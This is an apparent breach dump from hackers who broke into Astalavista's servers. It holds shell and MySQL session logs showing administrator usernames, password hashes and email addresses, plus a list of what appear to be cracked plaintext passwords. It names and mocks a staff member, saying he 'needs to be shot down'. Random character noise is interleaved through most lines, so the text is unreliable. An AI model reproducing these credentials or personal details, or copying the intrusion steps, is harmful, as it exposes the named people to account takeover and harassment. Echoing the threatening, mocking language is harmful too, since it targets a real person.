) q/ i* c1 Q2 B3 v" Z5 K <language>en-us</language>/ K) }& G$ ^- K- q. O$ N
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>, N4 f! D$ e! ?( y0 U3 w' ]
<docs>http://blogs.law.harvard.edu/tech/rss</docs>$ C) F' G: G" R7 W4 v) J/ q* m, ]
<generator>Astalavista.com</generator>
6 T7 P& [! F' b) Y <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
5 @ t- O* m9 P4 b' p7 q N. {3 T4 }8 | </channel>
; z' X5 l# T* O5 U8 J( n3 R4 L; y</rss>’;
5 P- z( N+ X( _' s* B- K& \6 E
& X( [, {( K9 F9 | if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
: ^5 j& \, T _& z3 \# {% z unlink (FULLPATH . ‘/feed/exploits.xml’);
: A0 L9 @0 c$ Y5 q7 C }
0 J: F1 P/ O& \2 a0 {; `/ x- t
$ x9 j, B; v% `: R file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);4 w( ]' }% c) C, X- ^/ B" f7 O
[snip]
+ U- S( \9 X& s9 Q6 P! O; i% |$ n8 j
1 y+ k$ W: \5 c ^$ @sh-3.2$ cat exploits.sh
& w4 T: Y# B: P4 O Q#!/bin/sh
3 N8 I# z9 X) }. D0 O$ N4 K* E5 U) J
###########################################################
7 b$ n+ G( n+ j# #, m7 M& g" C5 E7 P
# Title: milw0rm exploits adder #
$ n: w4 D. @ J" {: q- Q2 L# Description: Add all milw0rm exploits to the ## @( T" {1 D k5 _& O; F/ p! G# [; J
# Astalavista.com database ## x1 T5 a1 R1 f' l; H; u' x
# ## y; j$ s- j8 I0 u0 c$ `( @
# Company: Astalavista Group #
: G% b) o# o- a+ d2 N7 x/ E& y4 ~# Author: Paulo M. Santos #
( }* }- Z+ k7 s5 e# E-Mail: 链接标记paulo.santos@astalavista.ch #& v) d# L z3 a; j
# ## W: s& D0 C: |& U3 |
###########################################################2 |- O# M8 q( D7 u/ I
# |1 W; E6 Q9 Q+ r3 f# path' j2 y; c$ _. R) a
this_path=/home/com/public_html/modifications/cronjobs) ~+ F+ i) @2 P5 N# |+ b1 L
- _' X' P4 L" ?! U# change directory
. q$ i: Q& A* a9 n% t1 ]0 \% Scd $this_path
% t& b8 e: t0 n8 L" x' o# _# q8 Zcd tmp/
) a4 |" ~! U8 O" A! w4 g
/ n0 q& ?7 Y( y" c6 t: S# delete files
9 E, u2 q8 I0 i/ t) F( ~' }rm -rf milw0rm.tar.* &4 [5 A7 T( X6 z: g# B
rm -rf milw0rm/ &
* V) P6 U, d( h/ } w4 e# L/ `8 K- n( y' z
# wget milw0rm paket( F2 e; O& ~9 h7 N, r) \
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]8 {0 A) ]1 Z. x! n$ S& a+ Y
; l$ m4 q6 ]4 _- U" S# extract milw0rm paket
3 G2 ]/ c5 s9 d; \, itar -xvf milw0rm.tar.bz2 X% M3 M4 q: s- T; G8 V9 N: e. ~
7 M$ G* d+ u8 p4 J8 B; u
# change owner
0 q5 P. x9 ]" {/ ~* c' y) Pchown -R com .
& {$ A0 ?# q: d- I( N4 U/ E( k& tchgrp -R com .
. S: L# x$ x) O9 d' Q; t. k% j
4 Z1 S$ `4 u! E# execute php script7 O* f) P& {5 j) v
cd $this_path& a& ]1 J w" t: U9 S* C% O# M+ \
php -q exploits.php
$ \, L1 g. a4 `* d. z0 t1 b+ W! I0 x/ g, F# h) v
# delete files( _. L0 L' g' x% o+ l7 c, O
rm -rf tmp/milw0rm.tar.*
, p# f4 u/ N; e0 X: zrm -rf tmp/milw0rm/ `) {* S. }& V" d* `
4 t7 @5 {. `' E# \ Zsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
- U1 x* i3 r x, {; k% ~7 c0 ?, P( _Paulo M. Santos needs to be shot down.
6 c: L" b8 h7 _) N
/ |; I9 o, P" F+ I' P5 r0 Umysql -u contrexxuser2 -p
( o/ o) u7 l/ r- ^; B; BEnter password:6 @2 t" c, |1 L" r, g
Welcome to the MySQL monitor. Commands end with ; or \g.
' ?5 \- w+ R$ ?Your MySQL connection id is 261694
9 d3 P# i6 e# F# [9 j# V4 wServer version: 5.0.45-community-log MySQL Community Edition (GPL)* H/ f0 x8 V$ t5 Z; X+ g; H3 S
2 ?; v; V/ S% D4 P
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 j! b9 h, U0 F! p, B. `7 K o
- A- [) V7 w: L4 w3 v- B; F+ r3 _mysql> show databases;
% m9 C+ C& X s J- d9 @+——————–+
! `$ ~! r% z K# n" g z$ v| Database |5 R- C1 h9 p; p9 q, S9 T
+——————–+# ?8 W$ d$ i$ ~1 ^
| information_schema |/ n/ q1 q) g7 i9 C
| com_contrexx2 |2 w2 u7 p' j4 M' l! j. e
| com_contrexx2_live |
. e% A L$ M+ h; Q! ]| test |0 r' {9 }) i, U \ S7 B
+——————–+1 n9 D( k# k) n' Z' Y1 c
4 rows in set (0.00 sec)/ c9 n A5 T/ a% V; T/ H4 K- ~
, o7 C) }% e% D" W% _
mysql> use com_contrexx2_live
' C* k8 |6 u) Q% a* l5 LDatabase changed2 r; a& y/ H: ?3 y
mysql> show tables;
( B& m; V' \0 D$ Y8 p. B4 U+————————————————–+( k |0 t1 Q$ V6 ~
| Tables_in_com_contrexx2_live |
* I% x7 R: t. z* U7 N+————————————————–+
5 W/ W% T$ C7 j+ ^( Q| cc_banner_counter |
) c" }/ x( Z3 o8 N) e" k2 i| cc_search_counter |
/ q& b5 E9 U0 o- z0 |3 B l3 j| contrexx_access_group_dynamic_ids |, S( d3 N: z8 H
| contrexx_access_group_static_ids |
- o9 I5 r) ~0 y2 ?0 Z* y| contrexx_access_rel_user_group |& g0 r( V# V: l
| contrexx_access_settings |- V# O' m& l( H u9 Q% r3 ?
| contrexx_access_user_attribute |4 P; _& ^3 z9 J, ]3 r
| contrexx_access_user_attribute_name |
, e: l5 i5 @; f/ M| contrexx_access_user_attribute_value |
/ G- J# C7 N y' D' d1 D! Z/ n9 ]5 z| contrexx_access_user_core_attribute |
_( b9 I/ \2 M. k9 f! L4 u| contrexx_access_user_groups |) C3 D# c# ~- v: H
| contrexx_access_user_mail |$ F" K! o- Z3 y9 d4 e" b
| contrexx_access_user_profile |2 S# u/ q9 `; D
| contrexx_access_user_title |
4 P }! M7 K8 Z" R7 o7 n" L| contrexx_access_user_validity |) b* ^3 h: O& n: q
| contrexx_access_users |# z: Z# M8 B$ h6 F2 Y+ m
| contrexx_backend_areas |( l( y# X5 h, S$ K
| contrexx_backups | d% B0 G0 |, A& j8 P T1 H/ D/ n
| contrexx_content |
; g. E9 D/ c7 k* r& Z; I; H7 [| contrexx_content_history |( R3 }( s) E0 z, J0 G6 v) k6 o
| contrexx_content_logfile |
6 ^* ]+ v" d: a0 ]; E3 H0 i| contrexx_content_navigation |
: m: a1 r+ _$ ?| contrexx_content_navigation_history |
! x! G& A' u; N; y5 _0 a4 e" || contrexx_ids |
" k9 J3 F; I. W2 }0 x9 @+ p| contrexx_languages |4 a; Z: t+ a: H% a" o* n9 S' ?9 g: a
| contrexx_lib_country |
2 r- E- x6 r7 j8 `| contrexx_log |" H q$ J& k* P; G5 Y/ c/ j
| contrexx_module_alias_source | u) ^1 O3 V/ E( f
| contrexx_module_alias_target |" Y! m7 l% E) z8 O: r% L) X
| contrexx_module_block_blocks |
6 @/ c# ^5 V* v- x. b: U0 J| contrexx_module_block_rel_lang |
8 w& I, s) A- G* Z# I* g) T, a| contrexx_module_block_rel_pages |
1 `" a& I; a+ i3 Z' C| contrexx_module_block_settings |
7 T7 P$ B5 t9 j5 h9 q8 s$ i) q* ~| contrexx_module_blog_categories |; O4 l9 M, L2 E2 u9 ]7 c
| contrexx_module_blog_comments |% s1 s5 V8 g, j, @- ]1 n
| contrexx_module_blog_message_to_category |
7 {/ i3 J/ m( p5 e, M5 d' ^| contrexx_module_blog_messages |# W9 D% N8 a/ s6 ^
| contrexx_module_blog_messages_lang |
! n0 f- ?( q3 l+ p4 ~| contrexx_module_blog_networks |' j) k$ b: E) m/ z7 B7 F
| contrexx_module_blog_networks_lang |6 ]: E5 g8 I! X4 b0 D9 s' ]2 M
| contrexx_module_blog_settings |
& x( J% Q+ V" ]" C; W4 q| contrexx_module_blog_votes |& h+ l* e+ A3 F1 o. M, f
| contrexx_module_calendar |2 `+ _- p, i+ Z$ K' `* T* q
| contrexx_module_calendar_access |
6 d; k& ]' W; j' l# q- @| contrexx_module_calendar_categories |2 S1 c( u2 ]. c! o1 I$ \: _ `4 t* C
| contrexx_module_calendar_form_data |; N( \, \6 c: C) z6 Y
| contrexx_module_calendar_form_fields |$ v5 U1 Y" h5 B; y, Y' a( d
| contrexx_module_calendar_registrations |
! H( i0 c8 A5 h' u4 Q; n6 N, J| contrexx_module_calendar_settings |* l% y( M2 W) U1 _3 T
| contrexx_module_calendar_style |0 {9 [4 o I: M
| contrexx_module_contact_form |; ]: f2 v; k6 p3 ~
| contrexx_module_contact_form_data |8 `5 z2 }1 ]. `% X$ w( @# L W; `
| contrexx_module_contact_form_field |- j0 p" v' E9 E9 A% Y& m0 W0 ~
| contrexx_module_contact_settings |: Q$ l7 N8 x% n- U
| contrexx_module_data_categories |
, C- w% p( o2 u- I2 o- R| contrexx_module_data_message_to_category |8 v. M: {/ E) M# Y! Q5 A
| contrexx_module_data_messages |; w0 e6 o) E2 U) \# b. J
| contrexx_module_data_messages_lang |( P5 o5 ]2 B; y. L$ W
| contrexx_module_data_placeholders |+ L8 S: J4 F% ]* [" ^- K
| contrexx_module_data_settings |
: C R3 r1 r2 [5 |$ _| contrexx_module_directory_access |2 l9 Q8 u" p9 z5 l# U4 [6 v& }
| contrexx_module_directory_categories |
/ ~% z: n9 P5 G' V| contrexx_module_directory_dir |
3 s6 w. T6 w4 \$ h/ w| contrexx_module_directory_inputfields |
8 X7 d4 `* }2 Q* t3 K! n. _| contrexx_module_directory_levels |
# `" w6 m+ e+ \" b7 Q. n| contrexx_module_directory_mail |7 \! p! M0 K5 h
| contrexx_module_directory_rel_dir_cat |) T4 T! g# U O, M& R0 F
| contrexx_module_directory_rel_dir_level |
) k1 o( @1 _) ?1 g' J7 H| contrexx_module_directory_settings |; z3 g0 C6 h0 k5 O: I! f" v
| contrexx_module_directory_settings_google |
& g+ s; O& B5 q| contrexx_module_directory_vote |1 z( v4 {8 O$ K
| contrexx_module_docsys |* i: P; M: K% M" {4 q* l. b
| contrexx_module_docsys_categories |
8 F' ]! b7 x+ E! n7 U- z( r| contrexx_module_egov_configuration |# w8 s2 B4 w1 |- C
| contrexx_module_egov_orders |3 x( A% e. _) ]$ n$ `( J/ H$ N$ u
| contrexx_module_egov_product_calendar |2 t8 e' N0 q/ l% E( ~
| contrexx_module_egov_product_fields |8 J0 o8 G* \* v5 |% W5 Q6 R$ z2 d
| contrexx_module_egov_products |' L+ |: o( T' ?
| contrexx_module_egov_settings |: L1 m+ Q+ |- S$ F3 @
| contrexx_module_exploits |
' i1 `1 P0 r9 d' n7 A" U* \| contrexx_module_exploits_categories |
+ [* v* C' _% l) K| contrexx_module_feed_category |9 t `. y" S+ f
| contrexx_module_feed_news |
0 y7 w4 i2 r, j3 P| contrexx_module_feed_newsml_association |
6 j6 ?% r& v" t# e| contrexx_module_feed_newsml_categories |6 S0 P7 h2 u( h' f8 @$ L
| contrexx_module_feed_newsml_documents |
; i/ o: M; L5 @3 [! W| contrexx_module_feed_newsml_providers |
6 f8 e8 T" g( u| contrexx_module_forum_access |1 H$ F4 v( d8 \6 P5 D2 h) ^' `/ d7 I
| contrexx_module_forum_categories |: `$ L; I" `, z' @( P. I
| contrexx_module_forum_categories_lang |1 |2 E5 _8 g: J# C/ v( k5 G8 O5 t/ Q
| contrexx_module_forum_notification |
( V- E% H' K+ M) K. U1 @7 @0 g| contrexx_module_forum_postings |# H* \2 {; P+ S* r+ x2 C% M O
| contrexx_module_forum_rating |
4 q5 z" R* c; I( ]3 k8 F7 j. M" a| contrexx_module_forum_settings |& D9 U% q- a9 k2 i& {* M- k+ ?
| contrexx_module_forum_statistics |: n- a& x" ]8 c) n
| contrexx_module_gallery_categories |$ Y8 m( N, u* p! t. d
| contrexx_module_gallery_comments |
( O; G q6 q: C5 D& W| contrexx_module_gallery_language |
4 G# Y, f E9 K9 S% g/ {7 x- e0 n| contrexx_module_gallery_language_pics |
' k4 `" I- N. n+ U7 }$ ?! `| contrexx_module_gallery_pictures |
% N( j8 O, A) U3 A, B* I| contrexx_module_gallery_settings |
9 F6 e" n, n/ q; N" B% F| contrexx_module_gallery_votes |, h: P0 B0 R B
| contrexx_module_guestbook |. @% u: m% K% L$ C( A% X# o4 w. }
| contrexx_module_guestbook_settings |
3 a4 a a" `" ]6 U| contrexx_module_livecam |# O/ w8 D4 f) S) |7 c2 |
| contrexx_module_livecam_settings |
2 a* R% w% x% C| contrexx_module_market |
+ v' [% V4 I/ ~! s8 c. T| contrexx_module_market_access |# ?, @3 m% h* \- w- u1 B8 R! H2 z
| contrexx_module_market_categories |6 G& f, q8 t8 o4 Y
| contrexx_module_market_mail |3 z: f: i# k' d! s1 ^3 ]! k
| contrexx_module_market_paypal |. F R# N7 Y* l; b/ Z
| contrexx_module_market_settings |
/ @# o$ h/ b; ]) Q+ j5 M- I1 i8 Z| contrexx_module_market_spez_fields |9 R# @: E a. M9 O! x* j
| contrexx_module_mediadir_access |
; J( `- g# q) g- K| contrexx_module_mediadir_categories |
# Z! L. ^& L, U; i8 g| contrexx_module_mediadir_comments |8 I( f! L/ g4 X7 l7 L* P0 S
| contrexx_module_mediadir_dir |
6 d* A4 w5 C' ]) g& \9 K$ h' Q| contrexx_module_mediadir_inputfields |% A5 V$ c7 ]- N: i$ n1 O
| contrexx_module_mediadir_levels |! X& q% m2 W7 K) p/ k F, z
| contrexx_module_mediadir_mail |
& d8 | F: j/ ~! D) @6 v- R| contrexx_module_mediadir_rel_dir_cat |2 n/ O* }3 _9 {, B
| contrexx_module_mediadir_rel_dir_level |" y! t; k) ^, o8 a! H: t& d2 C
| contrexx_module_mediadir_reports |
; k) B1 w6 E: n {" l0 f| contrexx_module_mediadir_settings |
, \3 c @3 l# Y( `; z/ {| contrexx_module_mediadir_settings_google |0 x3 w) Q6 E3 c/ X* {
| contrexx_module_mediadir_vote |
" ?6 _( @3 C, J" _5 K| contrexx_module_memberdir_directories |
1 I W# `8 ]$ e4 m4 U5 j1 r" d| contrexx_module_memberdir_name |
9 C( B& X9 y1 h0 U; T' k, Z| contrexx_module_memberdir_settings |
; [# m# x h8 f5 v" x C| contrexx_module_memberdir_values |/ ?6 V' U5 Z6 E& d
| contrexx_module_nettools_allowed_groups |, t( u$ }/ O9 I7 W8 @5 }
| contrexx_module_nettools_settings |
8 S& k) H9 L9 }$ v+ t( y8 i| contrexx_module_news |5 k( a9 v, i2 N' O
| contrexx_module_news_access |
5 i1 C6 h; M& e+ K) S0 X4 ]1 l| contrexx_module_news_categories |
& |; P5 |( Q* o9 j i% h| contrexx_module_news_settings |3 w5 V! W; L! Q d7 V
| contrexx_module_news_teaser_frame |5 |4 E) ^4 X6 m5 |1 u1 I
| contrexx_module_news_teaser_frame_templates |7 R( i* Y [/ u& ?# g* j. H6 a$ a
| contrexx_module_news_ticker |
* {6 d- h3 l% E+ U9 z1 Q' P| contrexx_module_newsletter |1 x- q: s6 A/ R
| contrexx_module_newsletter_attachment | b$ f: j" w% r ^
| contrexx_module_newsletter_category |/ w/ w# a! J* p7 N
| contrexx_module_newsletter_confirm_mail |6 C, j0 s$ k7 a' G3 J" i
| contrexx_module_newsletter_rel_cat_news |, ?6 ]: A: `& x& @
| contrexx_module_newsletter_rel_user_cat |3 @; o/ q+ N) g( U
| contrexx_module_newsletter_settings |- X) n+ H* q2 O) w0 ^
| contrexx_module_newsletter_template |
* h2 i( `) I0 A$ D" ?| contrexx_module_newsletter_tmp_sending |2 C! w% T0 g/ y8 s
| contrexx_module_newsletter_user |
$ A& S# @3 c& ^0 o2 `5 d+ @# o| contrexx_module_newsletter_user_title |
5 h) X7 G ~2 }: e| contrexx_module_onlinetools_defaultports |7 W8 A* l& \- F6 J
| contrexx_module_onlinetools_defaultports_back |
+ j, z% E( ]9 a6 E$ F% A$ S| contrexx_module_onlinetools_geolitecity_blocks |
5 w$ k, m) m3 _4 L% W# b/ ]| contrexx_module_onlinetools_geolitecity_country |
( q6 s) H/ U( K1 U* r) j* O& S$ G% ]5 Q| contrexx_module_onlinetools_geolitecity_location |
/ m$ l7 k( G3 q+ {| contrexx_module_podcast_category |
, {3 Y" ?8 @; k+ l; L| contrexx_module_podcast_medium | O. e9 u8 Q j6 D' H3 Q. [0 a2 E
| contrexx_module_podcast_rel_category_lang |
$ [7 i/ c/ N/ D/ N! m3 x| contrexx_module_podcast_rel_medium_category |
" R& L4 ?+ w$ N( T" P| contrexx_module_podcast_settings |5 \5 B: I3 w* C- a( I
| contrexx_module_podcast_template |
: l1 _% A2 N$ j5 I% Z- S/ B) L| contrexx_module_proxydb |$ M, b: |5 N/ e& a# q+ @
| contrexx_module_recommend |& j2 X% j4 F+ e% ?3 u5 @
| contrexx_module_repository |& O4 Y, H% L$ g9 l8 ]% }1 F
| contrexx_module_securitynews_cats |6 B9 g+ z ?7 B1 h$ u
| contrexx_module_securitynews_feeds |
) @7 @ L- B/ k$ h/ P; d$ c| contrexx_module_securitynews_news |
5 \4 T, m) ^4 v2 G9 A' O( @8 B| contrexx_module_shop_categories |
# [- ]3 y1 a7 r* j2 I& I| contrexx_module_shop_config |
* {/ C* z# K& Q' d' a! F| contrexx_module_shop_countries |: @: j, i+ @4 f0 @1 Z& n$ S2 ^
| contrexx_module_shop_currencies |9 I! ^- B* ?/ `; I9 N0 p
| contrexx_module_shop_customers |. K1 E( `4 H$ s8 T/ T; ^
| contrexx_module_shop_importimg |2 ]. F- ?5 s5 c( q0 p7 r( D
| contrexx_module_shop_lsv |
" e, _( H4 { D: f7 f| contrexx_module_shop_mail |
9 o! Y; B5 {/ P5 H| contrexx_module_shop_mail_content |
1 i$ j( @" ^/ E F) q/ n! _| contrexx_module_shop_manufacturer |4 b7 c' {( C/ y
| contrexx_module_shop_order_items |
! `4 E, q; n/ v/ x6 A5 v| contrexx_module_shop_order_items_attributes |. N! E( `" O& R9 S: k, a
| contrexx_module_shop_orders |* w1 U, h2 [5 d3 n! M9 o
| contrexx_module_shop_payment |+ p" t8 L w: z3 G6 P$ w7 y Z
| contrexx_module_shop_payment_processors |
- f- M7 _7 x! S5 o- m+ E| contrexx_module_shop_pricelists |7 G: |5 T' r4 i" y7 g, [
| contrexx_module_shop_products |5 y% r0 J# G. o& A7 s) i
| contrexx_module_shop_products_attributes |
1 w4 t' o9 w9 J| contrexx_module_shop_products_attributes_name |
! `( q/ P4 R% [4 e| contrexx_module_shop_products_attributes_value |% x. w f3 g4 ]; Y1 A/ J/ [/ r
| contrexx_module_shop_products_downloads |% J2 c) t( X" s- @3 h' a! x! K2 X6 S
| contrexx_module_shop_rel_countries |( q: m+ R5 ]/ `) y8 _. Y/ [4 Y
| contrexx_module_shop_rel_payment |
7 g! O. T3 d- e m. l- f| contrexx_module_shop_rel_shipment |! V( s3 c) L" g) v) u
| contrexx_module_shop_shipment_cost |
: m' i4 ]! J% K* y0 i& a| contrexx_module_shop_shipper |
' |3 V/ q% N& E# g# G| contrexx_module_shop_vat |: N+ m! P" i5 z2 d% q5 P3 s
| contrexx_module_shop_zones |+ e1 h& F5 H" l1 t* Z' y! |
| contrexx_module_u2u_address_list |
2 M. r# v9 b6 \7 }| contrexx_module_u2u_message_log |% x, B d: @7 ]
| contrexx_module_u2u_sent_messages |
5 x% o9 `0 N4 a% n* p0 O7 m| contrexx_module_u2u_settings |; _( m% p4 K/ |! j
| contrexx_module_u2u_user_log |
4 |. n' J2 A9 b$ E| contrexx_modules |: L1 ^9 w- u5 A$ V! |) v7 e
| contrexx_sessions |
& Z! Z6 r5 [2 B" U| contrexx_settings |
; y6 s: z- I) t) Q6 ?| contrexx_settings_smtp |
2 K/ h% q+ h% b8 \& e| contrexx_skins |
2 l0 ]6 j9 \8 ]2 t, g) j G| contrexx_stats_browser |, O, X6 D# U4 t" u6 e
| contrexx_stats_colourdepth |
/ x) \) F' l. b$ d6 d; X7 D| contrexx_stats_config |) Q9 \" @7 r5 F, j7 C% c
| contrexx_stats_country |
6 B8 M* X: {$ ~$ `1 g| contrexx_stats_hostname |" C4 U# D! m0 [; X1 Q" |
| contrexx_stats_javascript |* U' s/ ]* y1 `( G7 [% D: F
| contrexx_stats_operatingsystem |
7 U6 _) k- k$ x. T! [. {- z| contrexx_stats_referer |$ e( R) x6 @6 t) J7 {% s! b
| contrexx_stats_requests |2 u/ B4 @, f. Y2 A& u+ n
| contrexx_stats_requests_summary |/ o: m1 d7 ]' [ i$ N
| contrexx_stats_screenresolution |
; a7 Y7 O7 H' q7 Z- O* m) F/ y| contrexx_stats_search |
$ f: Y) s/ v, W5 o+ }1 S, V| contrexx_stats_spiders |
1 _1 j u9 {/ l* v5 t0 B7 ?1 o| contrexx_stats_spiders_summary |1 n6 T9 ~5 X7 k5 [) T
| contrexx_stats_visitors |) G& L# s+ @. c1 t6 t2 _: q5 F1 J
| contrexx_stats_visitors_summary |
5 E5 e/ P |* I9 L, X% @| contrexx_voting_additionaldata |, I1 ~, V b% M6 t3 I6 Z t
| contrexx_voting_email |. i& G- v" R S( U. O* s
| contrexx_voting_rel_email_system |
- H+ ?/ Y+ n7 y: Q7 {! v) h1 n| contrexx_voting_results |& O' ~: m& Y$ {. |
| contrexx_voting_system |2 O p9 k8 b4 `# l; @! Z
| foo |
+ I0 y H& ^. A0 o+————————————————–+
9 a5 X( U# w; T5 W6 ?9 L! p9 e5 ^227 rows in set (0.01 sec)
/ B4 c7 V$ X( }& D# V6 l! q6 t
: J7 M* ~: U, B+ u% V0 bmysql> select count(*) as skids from contrexx_access_users;% D9 B. U6 W0 k s I, z
+——-+
# [0 X7 A% ~# n3 L1 y9 k; U: ]| skids |
% A1 [6 b1 o) E' r) f: E+——-+# w, o- Y( i! O+ J* e. r" o
| 53699 |) J! Y, o1 q3 S+ `9 y4 `
+——-+
% R; V* D) I# \1 p9 X3 r1 row in set (0.00 sec)
' ?: d% [) X! z+ \4 h3 L* z5 X8 H2 }
mysql> describe contrexx_access_users;' g+ j$ y) f" n1 v
+——————+——————————————+——+—–+————–+—————-+8 T! R z* I+ H% [# ?5 ^+ k4 m
| Field | Type | Null | Key | Default | Extra |0 c: `* Z& Q7 \; { O) t' z
+——————+——————————————+——+—–+————–+—————-+
$ S+ u0 y3 @9 U! w| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
, J$ Y0 {2 O1 A3 }# m| is_admin | tinyint(1) unsigned | NO | | 0 | |
4 v! A5 F0 y1 y; M! q5 g5 m! q| username | varchar(40) | YES | MUL | NULL | |
U' H+ J: _% ?' ~% Y0 A$ g; S| password | varchar(32) | YES | | NULL | |
9 k3 v3 H6 d. M( m" y* Y& E) A T| regdate | int(14) unsigned | NO | | 0 | |9 [4 [$ T v V8 c( D7 B
| expiration | int(14) unsigned | NO | | 0 | |( s8 R. R# s& |9 i) b# b2 \4 F2 j
| validity | int(10) unsigned | NO | | 0 | |: ~# o% ^5 G, o, ?
| last_auth | int(14) unsigned | NO | | 0 | |
! p; l. R1 ]9 {& p# }& {8 } }6 e| last_activity | int(14) unsigned | NO | | 0 | |
8 u! W; A; Q! e4 `| email | varchar(255) | YES | | NULL | |/ n7 K; H9 N/ }' [, l
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |/ C) S) Q. f \
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
* ~, d4 x' r5 T, h8 ^) p* G8 E, O| backend_lang_id | int(2) unsigned | NO | | 0 | |
' R& H! `" z9 e# o1 P4 j| active | tinyint(1) | NO | | 0 | |3 r! s5 Z6 S- w
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
e; K) T3 C2 n( |( u7 g| restore_key | varchar(32) | NO | | | |4 g) T: D; `2 `* ?3 n
| restore_key_time | int(14) unsigned | NO | | 0 | |, E/ J1 b/ I8 _. x$ I# L
| u2u_active | enum(’0′,’1′) | NO | | 1 | |+ z. d i# k0 {% |$ j) m$ N, U
+——————+——————————————+——+—–+————–+—————-+3 \8 }8 P9 k% t; f) e
18 rows in set (0.00 sec)5 H$ B2 q# s. |7 m
3 ~, L& Z7 Y4 T0 ^# n5 B0 x1 _mysql> select username,password,email from contrexx_access_users where is_admin = 1;
. k4 s" p/ Q3 w+————+———————————-+—————————–+
# W. x% w! N0 ~| username | password | email |
, V5 y; _; G+ m" P1 N% ^+————+———————————-+—————————–+0 M6 c1 Q2 T" C# s o8 Y* b; r
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |0 I7 R' m( \2 k% A- M- Z
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |& z* M/ ] y- J+ l3 I
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
9 e2 o/ }7 Y: H* f) \ K| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |% b% V* S7 @6 J9 m( a; W0 X
+————+———————————-+—————————–+9 b; V8 M F/ W/ u1 w5 X5 X
4 rows in set (0.04 sec)
3 F; y1 h L, G4 h' `( i: x6 @( N$ f8 ?. R9 ^8 N V
mysql> exit; e8 \ S/ C- J# W5 ]8 L
Bye
3 `' R p; Q7 f3 ^$ s+ i1 l# h7 |* H! C( e* }$ s9 w. ?1 F
[~] There you go, your “team of security and IT professionals” is a joke.
2 i% T2 {5 U4 M- a: B) ]" B
) `' o; p9 U: ?& v) f2 y* C+——————————+3 h6 u: n, J8 W1 u0 i
system:f82BN3+_*7 ]& B) y ]$ E6 a4 m
Be1er0ph0r:belerophor4astacom
4 s7 r0 d g2 F& s& i) |prozac:asta4cms!. B$ P& M$ h% j0 r* j: H
commander:mpbdaagf6m
, m Q7 L% ?7 ?0 q; J+ Vsykadul:ak29eral+ E9 h+ `4 w2 i1 B
+——————————+$ f# ]5 K6 t) {
, I- @8 ~- p J' ^
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)3 o1 @: ?2 n8 b7 A! H7 S$ b) w
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.( B* q9 _$ H6 s- i
$ z& y6 B& E1 z, \
[~] Lets move to astalavista.net now,; ~ a3 w9 Y% h, x8 U
, o6 a! ]# D0 S3 p! P7 k) V- E! z) ^
From <链接标记[url]https://www.astalavista.net/[/url]>:
0 C* G5 G7 c3 @7 Q>> Everyone knows that the best defense is a good offense.) ^0 z: m' R' a- G1 U& e
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
- ?3 a( E; G, k5 s( A G& @>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
0 U4 c* u: A. w7 `* Z' u>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”% ?8 O# k5 z3 H# D, C
% ?4 ] j |- k5 X% f; J! n% U' X
>> Go ahead, try and hack our server . in a completely legal way!/ m, O# e& f( Y$ i/ c" S! M
>> Learn by doing: We offer our members tricky tasks and challenges on an
! C7 ]8 ?( A1 p& y' Q>> ongoing basis so you can test your knowledge and abilities. You can also
- i( }2 q3 n, B# f. r>> demonstrate what you.ve mastered by taking part in regular hacker contests
$ v3 t9 @9 B/ X# F [+ X>> and war games
. e0 b7 ^/ U: o: P5 r1 q4 O
: ]+ G* N( ?2 H7 \! u8 @[~] Lets take a look there, after all… they are hack-proof, aren’t they?!0 A2 b1 a7 c# @& @2 M" Z
; A5 a1 i' h- F[-] Tricky task: Find home dir of astalavista.net* j5 b8 C, {# i/ ?3 F: l2 P
$ o. W4 @4 G. V" q( d0 G/ Y3 l
sh-3.2$ ls -la ~astanet& d$ G/ I( t2 u5 c5 o* x, X3 I7 a
total 48# p" H. g* C# n, W1 z) Q2 [) W& I
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .7 Q8 N3 I6 K- ?* G s; d: n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ G1 R' L+ s/ S/ n3 Y( ydrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
/ P. x/ T) J' v8 [7 q-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
7 n2 C% e1 z+ X6 [! L0 O-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout3 s. T2 e2 r: U
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile. r# y8 [- f9 e4 k
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
: ]" e$ z, M/ H6 ~! mdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains7 B8 @2 C3 J! \
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
9 `5 J1 r' c3 ?) {/ V, o# L- Tdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail1 D+ O& n& Z) D
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 m0 F& E0 S. s1 i3 c3 g-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow8 c7 l9 o: i6 `) X. v& }/ T
, D$ N% S$ }( B3 W) lsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
: q& c8 M6 H$ T- F' ssh-3.2$ ls -la, D4 p+ c- E" |6 D% }+ K
total 2000 m0 r' G. a3 O6 k8 Y
